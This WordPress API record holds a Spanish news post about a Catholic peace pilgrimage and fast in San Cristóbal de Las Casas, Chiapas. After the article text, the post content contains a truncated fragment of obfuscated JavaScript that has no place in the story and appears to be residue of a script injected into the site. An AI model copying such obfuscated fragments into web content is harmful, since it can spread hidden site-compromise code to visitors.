{"id":4173,"date":"2022-08-06T03:09:19","date_gmt":"2022-08-06T03:09:19","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=4173"},"modified":"2022-08-06T03:09:20","modified_gmt":"2022-08-06T03:09:20","slug":"realizan-peregrinacion-por-la-paz-en-san-cristobal","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=4173","title":{"rendered":"Realizan peregrinaci\u00f3n por la paz en San Crist\u00f3bal"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"571\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/WhatsApp-Image-2022-08-05-at-5.23.05-PM-2-1024x571.jpeg\" alt=\"\" class=\"wp-image-4174\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/WhatsApp-Image-2022-08-05-at-5.23.05-PM-2-1024x571.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/WhatsApp-Image-2022-08-05-at-5.23.05-PM-2-300x167.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/WhatsApp-Image-2022-08-05-at-5.23.05-PM-2-768x428.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/WhatsApp-Image-2022-08-05-at-5.23.05-PM-2.jpeg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez<\/p>\n\n\n\n<p>San Crist\u00f3bal de Las Casas.- Tal como lo hab\u00eda anunciado el p\u00e1rroco de la Iglesia de Guadalupe, Marcelo P\u00e9rez P\u00e9rez, feligreses cat\u00f3licos realizaron una peregrinaci\u00f3n simb\u00f3lica en la plazuela de dicho barrio, para pedir y orar por la paz en esta ciudad. &#8220;Se va construyendo con fe y esperanza puesta en Jesucristo presente en la Santa Eucarist\u00eda. El pueblo Creyente de la parroquia del Santuario de la Virgen de Guadalupe peregrina en la plazuela con Emanuel presente en la Santa Eucarist\u00eda. Cuando Emanuel comienza a caminar es la se\u00f1al de Dios presente en el pueblo para un buen porvenir&#8221; refiere el cat\u00f3lico. Desde el pasado jueves, Marcelo P\u00e9rez,  hab\u00eda anunciado iniciar  un ayuno y oraci\u00f3n para pedir por la Paz en el Mundo, M\u00e9xico, Chiapas y en San Crist\u00f3bal, ya que actualmente la violencia ha rebasado a las autoridades policiacas y solamente con la fe se podr\u00e1 combatir la delincuencia, por lo que piden que se unen a esta jornada de ayuno y oraci\u00f3n en San Crist\u00f3bal. El sacerdote indic\u00f3 que la peregrinaci\u00f3n es tambi\u00e9n de oraci\u00f3n por las v\u00edctimas y victimarios que han sufrido durante mucho tiempo, y que actualmente el pueblo sigue sufriendo. La jornada de actividades por la paz, adelant\u00f3, concluir\u00e1 el pr\u00f3ximo lunes a las 8 de la noche con otro recorrido en la misma plazuela, portando banderas blancas y velas prendidas en se\u00f1al de paz, &#8220;porque con la fe habr\u00e1 paz en la tierra&#8221;.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez San Crist\u00f3bal de Las Casas.- Tal como lo hab\u00eda anunciado el p\u00e1rroco de la Iglesia de Guadalupe, Marcelo P\u00e9rez P\u00e9rez, feligreses cat\u00f3licos realizaron una peregrinaci\u00f3n simb\u00f3lica en la plazuela de dicho barrio, para pedir y orar por la paz en esta ciudad. &#8220;Se va construyendo con fe y esperanza puesta en Jesucristo presente &hellip;<\/p>\n","protected":false},"author":2,"featured_media":4174,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-4173","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4173","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4173"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4173\/revisions"}],"predecessor-version":[{"id":4175,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4173\/revisions\/4175"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/4174"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4173"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4173"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4173"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}